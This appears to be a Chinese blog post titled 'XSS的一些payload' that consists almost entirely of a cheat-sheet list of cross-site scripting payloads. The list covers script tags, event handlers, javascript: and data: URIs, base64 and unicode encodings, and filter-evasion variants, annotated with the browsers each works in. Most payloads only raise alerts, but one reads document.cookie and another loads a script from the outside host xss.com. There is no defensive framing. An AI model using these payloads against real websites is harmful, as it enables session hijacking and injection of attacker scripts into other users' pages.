";alert(1);//xx
¼script¾alert(¢XSS¢)¼/script¾ //US-ASCII编码,如Tomcat
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT> //IE7以下
<![endif]-->
</title><script>alert(1);</script>
<a href="javascript:alert(1)">aaaa</a>
<a href="JavaSCript:alealertrt%25281%2529">aaaa</a>
<a onclick=alert(1)>XSS</a>
<a onmouseover=alert(1)>XSS</a>
<body onload=alert(1)> //无需js标签,可直接执行
<body background="javascript:alert('XSS')"> //IE7以下
<DIV style="background-image: url(javascript:alert('XSS'))"> //IE7以下
<DIV style="width: expression(alert('XSS'));">
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" allowscriptaccess="always"></embed> //Firefox/Chrome
<iframe src="javascript:alert(1)"></iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe> //Firefox/Chrome/Safari
<iframe src=# onmouseover="alert(document.cookie)"></iframe>
'"><img onmouseover=alert(1)> //IE
<img onmouseover=alert(1) src> //IE
<img src=x onmouseover=alert(1)>
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<img src=1 alt=al lang=ert onerror=top[url=1]alt+lang[/url]>
// 下面的img标签都是在IE7以下版本生效
<img src=JaVaScRiPt:alert(1)>
<img src=javascript:alert(String.fromCharCode(49))>
<img src=javascript:alert('XSS')>
<img src=javascript:alert('XSS')>
<img src=javascript:alert('XSS')>
<img src=javascript:alert('XSS')>
<img src="jav ascript:alert('XSS')"> <!-- 这里空格是tab -->
<img src="jav	ascript:alert('XSS');"> <!-- 	是tab -->
<img src="jav
ascript:alert('XSS');"> <!-- 
是回车 -->
<img src="  javascript:alert('XSS');">
<img DYNsrc="javascript:alert('XSS')">
<img LOWsrc="javascript:alert('XSS')">
<img src=`javascript:alert('xxxxx')`>
<img src='vbscript:msgbox("XSS")'>
<input type=image src=x onerror=alert(1)>
<input type="IMAGE" src="javascript:alert('XSS');"> //IE7以下
<link rel="stylesheet" href="javascript:alert('XSS');"> //IE7以下
<meta http-equiv="refresh" content="x;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> //Firefox
<script>alert(1)</script>
<sCrIpt>alert(1)</ScRipt>
<sCrsCrIptIpt>alalertert(1)</ScRsCrIptipt>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>window[url=0]'alert'[/url]</script>
<script>parent[url=1]'alert'[/url]</script>
<script>self[url=2]'alert'[/url]</script>
<script>top[url=3]'alert'[/url]</script>
<script src=http://www.xss.com/1.js></script>
[quote]</script>">'><script>alert(String.fromCharCode(49))</script>
<<SCRIPT>alert(1);//<</SCRIPT>[/quote]
<style>li{list-style-image: url("javascript:alert('XSS')");}</style><ul><li>XSS</br> //IE7以下
<style>a{width:expression(alert('11'))}</style><a href="x"></a> //IE7以下
<style>.xss{background-image:url("javascript:alert('XSS')");}</style><a class=xss></a> //IE7以下
<style type="text/css">BODY{background:url("javascript:alert('XSS')");}</style> //IE7以下
<svg/onload=alert(1)>
<table BACKGROUND="javascript:alert('XSS')"> //IE7以下
<table><TD BACKGROUND="javascript:alert('XSS')"> //IE7以下
<div style="background-image: url(javascript:alert('XSS'));"> //IE7以下
XSS的一些payload
最后编辑于 :
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
